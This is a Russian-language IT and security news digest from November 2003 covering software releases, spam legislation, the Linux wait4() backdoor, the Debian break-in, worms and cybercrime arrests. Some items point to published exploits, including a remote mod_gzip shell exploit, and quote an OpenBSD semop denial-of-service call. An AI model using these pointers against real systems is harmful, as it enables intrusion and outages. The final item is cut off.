Начала действовать русская версия Web-узла Microsoft Office Online. Это первый компонент русской версии системы работы с информацией Microsoft Office System, выпуск которой намечен на первую половину декабря. Новый Web-узел, англоязычная версия которого была запущена двумя месяцами ранее, пришел на смену узлу "Средства Office в Интернете" (Tools on the Web). На Web-узле Office Online пользователи смогут найти всю необходимую информацию и ответы на вопросы, возникающие у них при работе не только с последней, но и с предыдущими версиями Microsoft Office. Кроме того, новый ресурс будет полезен при создании собственных документов: Office Online предлагает сотни шаблонов для всех приложений, входящих в состав Microsoft Office, а также более 130 тыс. картинок, фотографий и звуковых файлов, которые можно сохранять на жестком диске компьютера или добавлять в документы Office непосредственно из окна Internet Explorer, используя операции копирования и вставки. Web-ресурс предлагает также курсы обучения для самостоятельного освоения всех входящих в состав Microsoft Office продуктов. Разработчики Office Online планируют постоянно создавать новые курсы в соответствии с пожеланиями и отзывами пользователей. В начале 2004 года планируется запуск украинской версии Office Online, приуроченный к выходу украинской версии Microsoft Office System. Источник - http://www.osp.ru
25/11/2003 13:08 Выход GCC 3.3.2.
Вышла новая версия популярного в мире открытых систем компилятора C - GCC 3.3.2. Возможно, это не последний релиз серии 3.3 и перед началом релиза 3.4.X будет выпущена версия 3.3.3. Changelog - http://gcc.gnu.org/gcc-3.3/changes.html#3.3.2
25/11/2003 12:34 Недельный отчет о вирусах Panda Software.
Panda Software выпустила традиционный, еженедельный отчёт о вирусах. В нём рассмотрены два червя - версии J червя Mimail и E червя Lohack, а также троян Banbra.B. Подробности - http://www.viruslab.ru/press/index.php?go=show&num=208
25/11/2003 12:15 В США почти принят закон о борьбе со спамом.
После шестилетних усилий федеральный закон, налагающий ограничения на рассылку непрошеной электронной почты, стал на шаг ближе к принятию. Палата представителей США подавляющим большинством голосов утвердила закон против спама, что, возможно, положит конец длящимся уже шесть лет бесплодным попыткам создать федеральное законодательство, ограничивающее рассылку непрошеной коммерческой почты. Эта мера, грозящая штрафами и тюремным заключением, призвана обуздать массовую рассылку рекламы продуктов типа виагры и предложений обогатиться. В субботу утром — после продолжавшихся всю ночь дебатов — за нее проголосовали 392 конгрессмена против пяти. «Американцы получают право заявить: „Вычеркните меня из вашего списка, мне это не нужно”», — говорит член республиканской партии Хизер Уилсон. По словам другого законодателя, республиканца Фреда Аптона, законопроект «защищает наших детей от невольного созерцания всего того мусора, который может вывалиться из семейного почтового ящика». Президент Буш пообещал подписать закон против спама, официально называемый Controlling the Assault of Non-Solicited Pornography and Marketing Act (CAN-SPAM). В пятницу вечером Министерство юстиции и Министерство торговли назвали CAN-SPAM «комплексом технологических, административных, гражданских и уголовных мер», который предоставит потребителям возможность сократить объем нежелательной почты. Источник - http://www.zdnet.ru
25/11/2003 11:13 Bluejacking: просто развлечение или нечто большее?
В мире появилась новое увлечение под названием «Bluejacking». Заключается оно в том, что сотовый телефон с поддержкой Bluetooth может отправить текстовое сообщение на другой такой телефон, не используя сотовую сеть и оставаясь анонимным. Технология «блюджекинга» использует стандартные функции телефона. Сначала создается новый контакт в записной книжке телефона. При этом в поле «имя» вписывается текстовое сообщение, которое надо отправить. После того, как контакт создан, владелец телефона запускает сканирование других Bluetooth-устройств. При обнаружении другого телефона, на него отправляется текстовое сообщение. В чем особенность такого развлечения? В том, что текстовое сообщение приходит как бы из «ниоткуда» — его отправитель остается анонимным. И в этом скрывается масса поводов для шутки. Тем более, что звук, который издает телефон при приеме, практически тот же, что и при приеме обычного текстового сообщения. Подробнее - http://playmobile.ru/news/bluejacking
24/11/2003 20:03 За электронное предложение увеличить пенис компьютерный спец пообещал кастрировать спамеров .
Программист из Силиконовой Долины невероятно разозлился на спамеров, которые в течение нескольких месяцев предлагали ему увеличить свой детородный орган. Когда терпение лопнуло он начал угрожать, что убьет их. Не сразу, перед этим помучает. Однако благородную ярость не сочли таковой. Полицейские арестовали 44-летнего Чарльза Букера. На данный момент его выпустили под залог в 75 тысяч долларов. История началась относительно давно. На протяжении длительного времени ежедневно компьютер г-на Буккера тонул в море бесполезных электронных сообщений, а также в нагромождении поп-окон. Программист не раз направлял жалобы в некую канадскую компанию, где отчаянно просил удалить его из листа рассылок. Тем не менее, ситуация не изменилась. Тогда он повел себя плохо: «Это была всего лишь попытка разрешить конфликт…Я просто потерял терпение». Чарльз Букер устроил переписку с канадцами. Он пообещал, что вышлет в компанию «пакет со спорами сибирской язвы». Замучает сотрудника с помощью электрической дрели, а потом прикончит его из пистолета. Кроме того, он будет выслеживать служащих компании, и кастрировать их. Во всяком случае, до тех пор, пока они не удалят его адрес их своей базы данных. Хотелось бы отметить, что история довольно поучительна. Неужели "программист" думал, что отправляя письма об удалении его из списков он достигнет желаемого результата? ;))) И неужели "программист" не мог принять меры к блокированию (см. выше) всплывающих (поп-ап) окон? Источник - http://www.runet.ru
24/11/2003 19:48 Линукс-рунет сообщество проснулось?
Не совсем понятна реакция линукс-сообщества на статью сайта theregister.co.uk об обнаружении закладки в исходнике Linux. Примечательно, что сама дата статьи означена аж 07/11/2003. Мы писали об обнаружении этой закладки, которая произошла по причине взлома одного из логинов девелоперов. Как ни странно, сегодня и linux.org.ru и глубокоуважаемый bugtraq.ru одновременно затрубили об бэкдоре в ядре Linux. Но ссылки, тем не менее, ведут на начало ноября (что heregister.co.uk, что lwn.net). Ну да - смысл закладки в том, что при выполнении функции wait4() c с опреденными параметрами получается шелл с правами суперпользователя (uid=0), дык вроде всё убрано, что из CVS, что из BitKeeper. В общем, не совсем понятна подобная запоздалая реакция этих уважаемых сайтов. Источник - http://www.uinc.ru
24/11/2003 18:45 Долой кейлоггеры?
Знак вопроса поставлен мной (newsmaker). Итак, www.bugtraq.ru сообщает, что Центр информационной безопасности сообщает о выпуске PrivacyKeyboard 2.0, основное назначение которой - противодействие всевозможному "шпионскому" софту, кейлоггерам и т.п. Программа использует эвристические алгоритмы, учитывающие основные принципы, присущие всем мониторинговым программам, и включает в себя модули защиты от перехвата клавиатуры, от захвата текста/графики из окон, от аппаратных и программных кейлоггеров. Ну что, программеры? Готовы поспорить с этим софтом? ;))) Подробнее - http://www.bezpeka.biz/pk.html
24/11/2003 18:28 Spyware выходит из тени.
В конце июля сотрудники британской финансовой компании нашли в своих почтовых ящиках электронное письмо с потайной начинкой, способной записывать конфиденциальные корпоративные данные и пересылать их через интернет, — spyware. Это письмо, озаглавленное «Приглашение на свадьбу», можно было принять за спам или обычного червя. Но консультанты секьюрити-фирмы Clearswift уверены, что оно было частью специально спланированной атаки на компанию с целью выудить определенную информацию. Подобный сценарий может стать ночным кошмаром корпоративных служб безопасности. Clearswift утверждает, что это опасная новая тенденция: spyware-программы получают все большее распространение. Относительно безобидные атаки с целью нарушения работы сети сменяются изощренными попытками украсть пароли и другую конфиденциальную информацию, чтобы использовать ее в корыстных целях. «Старые добрые времена «гиков» и script kiddies ушли в прошлое, — говорит менеджер отделения Clearswift ThreatLab Пит Симпсон. — Теперь орудуют преступные банды, которым нужно одно: деньги». После нескольких лет нарастающей тревоги страх перед spyware начинает овладевать теми, кто влияет на политику компьютерной безопасности и защиты во всем мире. Сам термин еще не имеет четкого определения и часто применяется как к программам для кражи информации вроде тех, на которые указывает Clearswift, так и к назойливым рекламным кампаниям, обычно сопровождающим такое бесплатное ПО, как Kazaa или Grokster. Подробности - http://www.zdnet.ru/?ID=309770
24/11/2003 17:12 Выход Linux 2.6.0-test10.
Очередная тестовая версия серии ядра 2.6. Что-то Линус никак не разродится выпуском. Хотя.... Обещали к декабрю. Может оно и к лучшему... Очередная версия багофиксов. Подробнее - http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.0-test10
24/11/2003 15:04 В 2003 году в США пойманы 125 киберпреступников.
В ходе масштабной операции правоохранительных органов США, направленной на борьбу с преступлениями в сфере высоких технологий были задержаны 125 человек. Об этом 20 ноября заявил представитель американских властей, сообщает Associated Press. В числе попавших в поле внимания полиции и ФБР людей оказались как и заурядные пираты, так и человек, незаконно пытавшийся продать через интернет высшую военную награду США - почетные медали Конгресса - и хакер, взломавший сайт катарского канала "Аль-Джазира". "Информационная магистраль должна быть средством общения, оповещения и ведения коммерческих проектов, а не большой дорогой для преступников. Ликвидация преступности в интернете является главным приоритетом для федеральных правоохранительных органов", - подвел итоги проходившей в течение нескольких месяцев операции генеральный прокурор США Джон Эшкрофт. В ходе работы американских властей было выявлено 125 тыс. потерпевших. Их общие финансовые потери составили свыше 100 млн долларов. В расследовании этих преступлений помимо полиции и ФБР принимали участие секретная служба министерства финансов США, почтовая служба и федеральная комиссия по торговле. Источник - http://www.viruslist.ru
23/11/2003 19:36 Эксплуатация Cisco маршрутизаторов.
Ну и в продолжение предыдущей темы хотелось бы указать ссылочку на статью, любезно переведённую ребятами из securitylab.ru под названием "Эксплуатация Cisco маршрутизаторов". Является первой частью из опубликованных автором Марком Вольфангом. Фактически посвящена теме исследования возможных уязвимостей CISCO-роутеров (сканирование, бруте-форс, опознавание при соединении по типичным баннерам). Статья - http://www.securitylab.ru/41385.html
23/11/2003 18:23 Всё, что Вы хотели узнать о BGP протоколе.
Благодаря woland с форума RTFM сайта sysadmins.ru, Обнаружена довольно полезная ссылка на страницу Джо Линдсей, посвящённую целиком опичанию протоколу маршрутизации граничных роутеров BGP (в основном, естественно, это касается изделий небезызвестной фирмы CISCO Systems). Описано очень чётко и конкретно - начиная от RFC и заканчивая примерами настройки конфигурации. Думается, будет небезынтересно начинающим "Цискарям". Ссылка - http://joe.lindsay.net/bgp.html
23/11/2003 17:20 Число доменов *.ru превысило 200 тысяч.
По данным РосНИИРОС, на ноябрь 2003 года в национальном домене России насчитывается 204 009 доменов второго уровня. Российский домен в рейтинге по числу зарегистрированных доменов приближается к национальным зонам Австрии, Бельгии, Польши, Китая, насчитывающих немногим более 200 тысяч доменных имен. Следом за Россией идут Чехия, Новая Зеландия, ЮАР, Венгрия. По темпам прироста доменных имен домен *.ru входит в десятку лидеров вместе с Великобританией, США, Канадой, Бельгией, Китаем, Гонг-Конгом и др. На данный момент ведущим регистратором доменных имен в зоне *.ru остается компания RU-CENTER, на долю которой приходиться свыше 48% всех регистраций. За ней следует собственно сам РосНИИРОС, прекративший заключение новых договоров на оказание услуг по регистрации доменов, но исполняющий обязательства по всем ранее заключенным договорам на регистрацию доменных имен. На его долю приходится чуть более 39% регистраций и эта цифра постоянно снижается. На долю всех остальных регистраторов приходится около 12% регистраций доменов. Источник - http://www.webplanet.ru
23/11/2003 17:11 Закрыта лазейка в новом ядре Linux.
Разработчики обнаружили и закрыли хакерскую лазейку в новой версии ядра ОС Linux. Недоработка представляла собой код, обращающийся к Linux kernel. Этот код был искусно замаскирован под безобидную функцию проверки ошибок. После пристального изучения выяснилось, что код, который вызывал теоретически безопасную функцию wait4(), использовал определенную комбинацию флагов, дающую процессу привилегии пользователя root. Это превращало wait4() в лазейку, позволяющую получить над машиной полный контроль. Для этого нужно было знать определенную комбинацию флагов. Опасность заключается в разнице между тем, как код выглядит, и тем, чем он на самом деле является. К примеру, в языке программирования C один лишний знак равенства меняет весь смысл строки кода. Источник - http://pcnews.ru
22/11/2003 23:46 Ошибка в Kaspersky AntiVirus 4.5.0.48.
По сообщениям www.bugtraq.ru Дмитрий Вольгушин aka J'JF на форуме этого сайта сообщает об ошибке в KAV, проявляющейся при проверке файла, зараженного Macro.Acad.Star - файл не лечится и не удаляется, движок KAV умирает. Производитель подтвердил наличие ошибки, но пока непонятно, связана ли она именно с Macro.Acad.Star, или с самим зараженным файлом. Идет работа над решением проблемы. Подробности - http://www.bugtraq.ru/cgi-bin/forum.mcgi?type=sb&b=5&m=93399
Update: По заявлению Александра Гостева (Лабаратория Касперского): Ошибка возникает из-за того, что лечение сделано для зараженных dwg-файлов, а в данном случае - это просто исходник. Поэтому при попытке лечения мы пытаемся именно вылечить файл, а надо просто удалять. Будет исправлено в очередном кумулятивном обновлении. Подробности - http://bugtraq.ru/cgi-bin/forum.mcgi?type=sb&b=5&m=93414
22/11/2003 17:25 Пара уязвимостей в OpenBSD.
Господин Sinan "noir" Eren (так он представился) опубликовал с промежутком в 3 дня 2 исходника эксплоитов уязвимостей, якобы существующих в ОС OpenBSD версий 2.x-3.x. Первая уязвимость связана с некорректной обработкой ссылки по нулевому указателю при разборе исполняемого файла - exec_ibcs2_coff_prep_zmagic(). Вторая - с возможностью полуяения DoS при формировании большого количества к семафорам в функции semop(i, (struct sembuf *) NULL, 0). Сам автор рекомендует применять патчи, типа grsecurity. Первый эксплоит - http://www.securityfocus.com/archive/1/344863/2003-11-12/2003-11-18/0 Второй - http://www.securityfocus.com/archive/1/345330/2003-11-19/2003-11-25/0
22/11/2003 16:19 Ещё один эксплоит уязвимости mod_gzip.
Выпущен ещё один, усовершенствованный, эксплоит уязвимости в модуле Apache mod_gzip. Авторы - наши соотечественники Over_G и d4rkgr3y (c securitylab.ru). Работа проверялась на серверах под управлением: Suse 8.1, RedHat 7.3, RedHat 8.0, RedHat 9.0, Mandrake 9.1. Эксплоит настраивает шелл на порту 63021. Исходник - http://m00.void.ru/message
22/11/2003 16:03 Взломаны несколько серверов Debian.
Мартин Шульц от имени группы разработчиков популярного дистрибутива Debian Linux сообщил, что вчера были взломаны несколько серверов, на которых велись различные проекты Debian. В частности, это затронуло следующие машины: master (система отслеживания багов), murphy (листы рассылки), gluck (web, cvs), klecker (security, non-us, web search, www-master, qa). Сообщается, что архивы не были инфицированы (или закладки ещё не обнаружены). Группа ведёт усиленную работу по обработке хранящихся файлов. Некоторые сервисы на настоящий момент неработоспособны, некоторые (в частности, сайт www.debian.org) перемещены на другие сервера. Взлом был осуществлён в тот момент, когда разработчики собирались представить широкой общественности новый пререлиз Debian GNU/Linux 3.0 (woody) - 3.0r2. На настоящий момент эту версию Debian можно найти на зеркалах сайтов. О подробностях взлома не сообщается. Подробности - http://cert.uni-stuttgart.de/files/fw/debian-security-20031121.txt
22/11/2003 15:02 Червь замаскировался под посетителя чатов.
"Вирусная энциклопедия" сообщает об обнаружении нового вируса Golember, распространяющегося через IRC-каналы. Выдавая себе за обычного пользователя IRC-чата, червь ставит перед собой задачу получить контроль над компьютерами своих собеседников. После заражения системы Golember соединяется с произвольными каналами и начинает "выступать" на них, подписываясь при этом различными никами. Тексты, которые рассылает "разговорчивый" червь, также отличаются друг от друга. Можно сказать, что таким образом вирус пытается познакомиться с посетителями чатов, войти к ним в доверие и убедить их принять от него файл. Тот, кто это сделает, и станет новой заражённой жертвой. Занимаясь распространением самого себя, Golember не забывает и о своих создателях. Им предоставляется возможность управления инфицированными компьютерами – в частности, вирус может принимать и передавать любые файлы. Источник - http://www.runet.ru
22/11/2003 14:10 В поисках музыкальных файлов студент проник в сеть ядерной лаборатории.
20 ноября в Великобритании состоялось судебное слушание по делу Джозефа МакЭлроя (Joseph McElroy), ранее признавшего себя виновным в несанкционированном внесении изменений в данные сети американской ядерной лаборатории, сообщает агентство PA News. Проникновение британского студента в сеть лаборатории, расположенной недалеко от Чикаго, вызвало настоящую панику среди ее сотрудников. При этом действительной целью МакЭлроя была попытка получить доступ к музыкальным и видеофайлам, не имеющим никакого отношения к ядерным исследованиям. В результате вторжения МакЭлроя сеть лаборатории на три дня была отключена, а сотрудники Скотланд-Ярда, получив сигнал от американских спецслужб, занялись поисками хакера и обнаружили его в собственном доме. Прокурор Шон Ларкин (Sean Larkin) признал, что действия обвиняемого не принесли никакого вреда национальной безопасности США, поскольку он не пытался получить доступ к секретным сведениям. Источник - http://www.viruslist.com
22/11/2003 13:58 ЕС создает агентство по борьбе с киберпреступностью.
ЕС создает специальную структуру для борьбы с преступлениями в сфере высоких технологий - Европейское агентство по сетевой и информационной безопасности (ENISA), сообщается на сайте BBC News. Планируется, что агентство начнет работу в следующем году, его штаб-квартира будет находиться в Брюсселе. Бюджет агентства составляет 24,3 миллиона евро. Главной задачей ENISA станет координация действий правоохранительных органов стран ЕС, которые занимаются расследованием киберпреступлений. Кроме того, агентство будет реализовывать различные обучающие программы по компьютерной безопасности для бизнеса и населения. В рамках работы ENISA планируется проведение исследований и выпуск образовательных материалов по защите от хакеров и вирусов, а также по другим аспектам информационной безопасности. Подробности - http://news.bbc.co.uk/2/hi/technology/3226178.stm
22/11/2003 12:18 RunetBSD.
Появился довольно любопытный проект под названием RunetBSD, продвигающий одноимённую ОС. Представляет собой Unix-подобную операционную систему, основанную на NetBSD 1.6.1 и поддерживающую аппаратную платформу i386. Помимо достоинств NetBSD, ОС имеет поддержку русского языка во всех приложениях, что делает ее удобной в освоении, настройке, и эксплуатации для российских пользователей. Проект довольно небесспорный, но, несомненно, должен привлечь к себе часть пользователей UNIX-подобных ОС (хотя, честно говоря, в части привлечения СИСАДМИНов возникают очень большие сомнения). Также настораживает в проекте огромное желание продавать бета-версию и некоторая вольность в обращении с лицензией BSD. Кроме того, сам проект портят явные ошибки в оформлении Вэб-сайта и форума в том числе. Сайт проекта - http://www.runetbsd.org/
21/11/2003 16:40 Удалённый эксплоит уязвимости в mod_gzip.
Опубликован эксплоит, позволяющий удалённо получить шелл на удалённом Вэб-сервере. Работа проверена на RedHat 8.0 (Psyche) и FreeBSD 4.7. Автор - наш соотечественник - Crazy Einstein. Исходник - http://www.securityfocus.com/archive/1/345094/2003-11-18/2003-11-24/0
21/11/2003 15:09 Microsoft запускает новостной поисковик.
На прошлой неделе началась тестовая эксплуатация системы MSN Newsbot, в рамках которой софтверный гигант предоставляет пользователям Всемирной паутины услуги поиска материалов новостных сайтов. В настоящее время функционируют четыре региональные версии службы, рассчитанные на жителей англоязычных стран, а также Франции, Испании и Италии. Со слов представителей Microsoft, MSN Newsbot индексирует свыше 4000 онлайновых изданий. Поиск может осуществляться по ключевым словам или же внутри категорий - "Спорт", "Кино", "Музыка", "Технологии" и т. д. Интересно отметить, что основной конкурент MSN Newsbot - сервис Google News - индексирует несколько большее количество интернет-ресурсов - свыше 4500. Зато служба Microsoft имеет одно весьма существенное преимущество - новая система умеет подстраиваться под каждого конкретного пользователя и персонализировать выводимую информацию. Поисковик - http://uk.newsbot.msn.com/
21/11/2003 14:55 Уязвимость Kerio Winroute Firewall.
Коллеги из www.securitylab.ru & www.security.nnov.ru (в лице господ - ЗАРАЗА & Pig Killer) сообщили BUGTRAQ об обнаружении уязвимостив Kerio Winroute Firewall версии 5.10. Web-сайт злоумышленника может получить имя пользователя и пароль текущего пользователя. Проблема обнаружена в обработке заголовка “Proxy-Authorization:”, когда на прокси-сервере включена авторизация пользователей. Заголовок “Proxy-Authorization:” содержит имя и пароль текущего пользователя в откытом виде (BASE64). Вместо того, чтобы удалять этот заголовок при запросе удаленного Web сервера, прокси-сервер заменяет этот заголовок на “ Xroxy-Authorization:”. В результате удаленный Web сайт может получить имя и пароль пользователя, авторизовавшегося на прокси-сервере. Подробности - http://www.securitylab.ru/41356.html
21/11/2003 14:35 Cертификация Panda Antivirus Platinum 7.0.
Программа Panda Antivirus Platinum 7.0 сертифицирована лабораторией West Coast Labs. Продукт компании Panda Software, предназначенный для систем Windows 2000 и XP Professional, получил сертификаты Antivirus Level 1 и 2. Версия для XP Professional также получила сертификат Trojan Checkmark. Лаборатория West Coast Labs является одной из наиболее престижных организаций в сфере ИТ безопасности. По этой причине сертификаты Checkmark дают пользователям однозначную и надежную гарантию качества сертифицированных антивирусных решений. В частности, сертификаты, полученные Panda Antivirus Platinum 7.0, гарантируют, что: Platinum 7.0 прошел ряд тестов, проверяющих его способность обнаруживать определенных троянцев (Trojan Checkmark); Platinum 7.0 способен обнаруживать все вирусы, входящие в список In the Wild (Antivirus Checkmark Level 1 и Level 2). Источник - http://www.viruslab.ru
21/11/2003 14:28 В США пойманы свыше 120 киберпреступников.
Министерство юстиции США подвело итоги первого этапа операции Cyber Sweep, направленной на борьбу с экономическими преступлениями в интернете. Мероприятия по поиску и аресту киберпреступников проводились при участии 34 прокуратур по всей территории США, ФБР, Почтовой инспекционной службой, Секретной службой США, Бюро по эмиграции и таможням, а также властями штатов и спецслужбами других стран. В ходе операции велась борьба с несколькими видами преступлений: различными мошенническими схемами, софтверным пиратством и торговлей краденым через интернет-аукционы. В ходе операции, начавшейся 1 октября нынешнего года, проводились расследования 125 случаев преступлений в интернете. Следователи обнаружили, что от киберпреступников пострадали около 125 тысяч американцев, а суммарный экономический ущерб от интернет-преступлений превысил 100 млн. долларов США. За время проведения операций арестованы свыше 120 подозреваемых, проведены 90 обысков, а также другие следственные мероприятия. Источник - http://www.compulenta.ru
21/11/2003 13:33 В отключении электричества на северо-западе США виноваты компьютеры.
Комиссия по расследованию причин крупнейшего в истории сбоя в электроснабжении США, подвела первые итоги своей работы, cообщает compulenta. Напомним, что в августе нынешнего года без электричества остались большая часть штата Нью-Йорк, прилегающие к нему районы штатов Нью-Джерси, Мичиган, Огайо, Новой Англии и канадской провинции Онтарио. Общее число людей, оставшихся без электроснабжения, достигло 50 млн. человек. По данным следственной комиссии, одной из главных причин случившегося стали проблемы с автоматизированной системой управления компании FirstEnergy. Из-за нарушения работы системы мониторинга и оповещения, сотрудники, обслуживающие системы энергоснабжения, просто не знали о возникновении неполадок. В итоге, три магистральные линии электропередачи замкнулись накоротко. Дальнейшее развитие событий напоминало эффект домино: системы энергоснабжения разных компаний отключались одна за другой из-за риска перегрузки. Пока еще предстоит выяснить причины сбоя компьютерной системы, использующейся в FirstEnergy. В комиссии по расследованию инцидента выдвигают две возможные версии - ошибка в системе автоматизированного управления GE Harris XA21 компании General Electric либо неумелые действия персонала по обслуживанию этой системы. Вариант с проникновением вирусов в компьютеры энергетической компании в комиссии всерьез не принимают. Подробности - http://story.news.yahoo.com/news?tmpl=...
21/11/2003 13:19 В Республике Корея ликвидирована сеть из нескольких тысяч хакеров.
Полиция Республики Корея объявила о пресечении деятельности хакерского сайта, к организации работы которого были причастны 4400 человек, сообщает сайт газеты The Korea Times. В рамках расследования, связанного с хакерским сайтом, правоохранительные ограны арестовали двух человек. В числе задержанных оказался и лидер группы хакеров Wowhackers. Внимание полиции привлекли еще 11 человек, подозреваемых в незаконном проникновении на сайты правительственных учреждений и частных компаний. Лидера группы Wowhackers, известного под прозвищем Хонг, подозревают также в удалении всей информации с сервера принадлежащего ему сайта о деятельности хакеров уже в момент нахождения под следствием. "Мы по-прежнему пытаемся найти свидетельства того, что они вторгались на интернет-серверы", - рассказал сотрудник корейской полиции Ли Пйон Ки. По словам Ли, следователям уже удалось собрать сведения, достаточные для предъявления задержанным обвинений в нарушении законов о частной информации. 24-летний Хонг создал группу хакеров в мае 2000 года. В ее состав вошли победители различных национальных хакерских чемпионатов. Участники созданной организации впоследствии сумели взломать серверы более 90 правительственных и коммерческих сайтов, похитить с них персональные данные почти 2,6 миллионов человек и разместить их на своем веб-ресурсе. Преступники легко привлекали в свои ряды новых членов, обучая их последним достижениям в хакерской индустрии. Сейчас полиция проверяет, не использовали ли хакеры полученную ими информацию в ходе совершения обычных, не связанных с компьютерами преступлений. "Два лидера группы руководили 17 квалифицированными хакерами, у каждого из которых в подчинении было до 20 менее грамотных преступников, так называемых "смотрящих". В свою очередь, "смотрящие" контролировали деятельность нескольких сотен обычных пользователей хакерского сайта. Это показывает как много сейчас появляется хакеров, и насколько хорошо они организованы", - сказал Ли. Из 13 членов преступной группы, попавших в поле зрения полиции, восемь человек - подростки. Возраст остальных - от 20 до 30 лет. К концу сентября количество зафиксированных в Республике Корея киберпреступлений составило 52 тысячи. Из них 20% приходится на инциденты с участием хакеров. Источник - http://www.virulist.com
21/11/2003 12:03 Буш проталкивает договор о киберпреступности.
Президент Буш попросил сенат США ратифицировать первый международный договор о киберпреступности. В письме к сенату Буш назвал спорный договор Совета Европы «эффективным инструментом глобальных усилий по борьбе с компьютерными преступлениями» и «единственным многосторонним договором, решающим проблемы компьютерной преступности и сбора электронных улик». США являются членом Совета Европы без права голоса, но они приложили много усилий к разработке договора о киберпреступности как способа установить международные стандарты в отношении нарушения авторских прав, онлайнового мошенничества, детской порнографии и несанкционированного проникновения в сети. Министерство юстиции США считает, что договор исключит «процедурные и юридические препятствия, способные задержать международные расследования или воспрепятствовать им». Правозащитники критикуют договор с самого момента его публикации в начале 2000 года, утверждая, что он нарушает свободу частной жизни и наделяет государственные следственные органы слишком большой властью. Им вторят отраслевые союзы, такие как Americans for Computer Privacy и Internet Alliance, выдвигая опасения, что договор ограничит анонимность или предъявит американским интернет-провайдерам расплывчатые требования по ведению архивных записей. Подробнее - http://news.com.com/2100-1028_3-5108854.html?tag=nefd_top
20/11/2003 16:53 Австралийские эксперты определили главную угрозу для информационной безопасности.
Почти три четверти всех компаний, использующих в работе онлайновые финансовые платежи, открыты для взлома методом SQL-инъекции. К таким выводам пришли специалисты австралийской компании B-sec, специализирующейся на обеспечении информационной безопасности, сообщает сайт газеты The Courier Mail. По данным B-sec, 72% ведущих австралийских компаний могут подвергнуться хакерской атаке методом SQL-инъекции, которая позволяет ее организаторам получить неограниченный доступ к корпоративным базам данных. Для получения такого доступа в ходе SQL-инъекции хакер дописывает в стандартный веб-адрес специальный код. Результаты двухлетних исследований B-sec, основанные на реальных хакерских атаках и тщательном изучении приложений, стали «настоящим шоком», считает специалист в области электронного права Лейф Геймерцфельдер (Leif Gamertsfelder). «Если этот изъян так широко распространен, единственным объяснением может быть упущение в работе корпоративного управления. Знай любой здравомыслящий директор или сотрудник компании о таком риске, дыра была бы закрыта мгновенно», - сказал Геймерцфельдер. Геймерцфельдер убежден, что в случае пропажи чьих-то персональных данных компании крайне трудно будет доказать, что она использовала адекватные меры для предотвращения хакерских атак такого рода. В качестве примера юрист привел случай разбирательства Федеральной комиссии по торговле (FTC) США и компании Guess Inc. Источник - http://www.viruslist.com
20/11/2003 16:09 Тюнинг OpenBSD.
Sun-ch на сайте linux.org.ru привёл ссылку на интересную статью, назначение которой - рассказать читателям о том, как оптимально настроить тяжелонагруженный сервер под OpenBSD. Формат, как видно, PostScript. Статья - http://cvs.openbsd.org/papers/tuning-openbsd.ps
20/11/2003 15:41 SCO собирается предъявить еще несколько исков.
Участники битвы SCO-IBM постепенно начинают переходить к «тяжелой артиллерии». Сначала Open Source Development Labs обеспечила Линусу Торвальдсу юридическую поддержку, а теперь и сама SCO обратилась за помощью к юридической компании Дэвида Бойеса (David Boies), которая станет представителем ее интересов. Напомним, что Дэвид Бойес был прокурором в антимонопольном деле против Microsoft. SCO планирует предъявить в течение ближайших нескольких месяцев иски ряду крупных компаний, использующих ОС Linux на своих вычислительных средствах. Как считает глава компании г-н Макбрайд, судебные разбирательства с конечными пользователями завершатся гораздо быстрее, чем выяснение отношений с IBM. Свои мысли по поводу спора с IBM, а также отношение к лицензии GPL, Дарл Макбрайд изложил в своей речи на Computer Digital Expo, новой ежегодной выставке, которая организована Jupitermedia и может стать конкурентом более знакомой Comdex. Помимо всего, глава SCO полагает, что эта лицензия помогает компании инициировать иски против конечных пользователей, а не компаний, распространяющих спорное ПО. При этом сама SCO втянута в конкурентную борьбу между теми, кто считает, что ПО должно быть общедоступно, и теми, кто поощряет лицензионную практику. Учитывая тот факт, что ближайшие слушания по делу SCO-IBM назначены на конец ноября, все действия противоборствующих сторон вполне можно считать артподготовкой перед началом основного сражения. Источник - http://www.cnews.ru
20/11/2003 15:28 Телефоны с шифрованием не позволяют шпионить.
Технология шифрования с открытым исходным кодом гарантирует тайну мобильных переговоров. Берлинская фирма CryptoPhone, подразделение частной компании GSMK, разработала мобильный телефон, недоступный для прослушивания. Европейская модель GSM (Global System for Mobile Communications)-телефона CryptoPhone с шифрованием уже продается за 2270 долл. (1900 евро), а в конфигурации для США он появится к концу этого года. Чтобы обеспечить безопасность переговоров, требуется два криптофона. «Сегодня это единственная возможность обеспечить надежное шифрование мобильных переговоров», — сказал в интервью во вторник технический директор CryptoPhone Фрэнк Ригер. Мобильные устройства с шифрованием, такие как Siemens TopSec GSM или модуль Motorola CipherTAC, предлагали и другие компании. Однако технология CryptoPhone уникальна тем, что ее аппарат дешевле, а весь исходный код ПО шифрования открыт. Это позволяет независимым программистам выявлять случайные ошибки и преднамеренно оставленные лазейки. Для шифрования CryptoPhone использует AES256 и Twofish, два алгоритма, относящихся к числу самых сильных. В большинстве стран, а то и во всех, перехват звонков GSM запрещен, но аппаратура для их прослушивания и декодирования вполне доступна. В документации на такую аппаратуру говорится, что она «автоматически обнаруживает», декодирует и записывает разговоры «по заданным номерам или случайно выбранным каналам мобильной связи GSM». Сам стандарт GSM включает некий алгоритм шифрования, но израильские инженеры недавно обнаружили в нем принципиальную ошибку. «Это уже не просто нечто теоретически возможное — это то, что найдется в инструментарии любого частного детектива», — говорит Ригер о средствах прослушивания GSM. Подробнее - http://news.zdnet.co.uk/hardware/mobile/0,39020360,39118021,00.htm
20/11/2003 14:15 PalmSource расширяет сферу применения Palm OS.
Софтверное подразделение Palm, компания PalmSource намерена расширить сферу применения своей операционной системы для наладонников, сообщает compulenta.ru. В планах PalmSource значится выход на рынок смартфонов и других устройств беспроводной связи. В понедельник компания представила партнерскую программу Palm Powered MobileWorld, которая предоставит операторам мобильной связи возможность высказать свои пожелания по поводу направления дальнейшего развития Palm OS. Они, в частности, смогут рекомендовать, какие именно протоколы и программные интерфейсы должна поддерживать система. Более тесное сотрудничество с PalmSource позволит сотовым операторам тщательно протестировать и откорректировать новые приложения перед запуском их в строй. PalmSource уже предоставила лицензию производителю пейджеров компании Percomm, которая планирует начать производство пейджеров и смартфонов, работающих на Palm OS, в первую очередь, для сетей стандарта GSM, а затем и для CDMA. Под управлением программного обеспечения Palm будут работать и пейджеры новой сети обмена сообщениями компании Percomm - ReFlex. Программное обеспечение Palm поможет Percomm снизить издержки на разработку ПО, ускорить выход на рынок новых продуктов и услуг, а также обеспечит поддержку большего количества приложений, заявил президент Percomm Эдмонд Фанг. В настоящее время устройства, выпускаемые Percomm, работают на собственном программном обеспечении. Подробности - 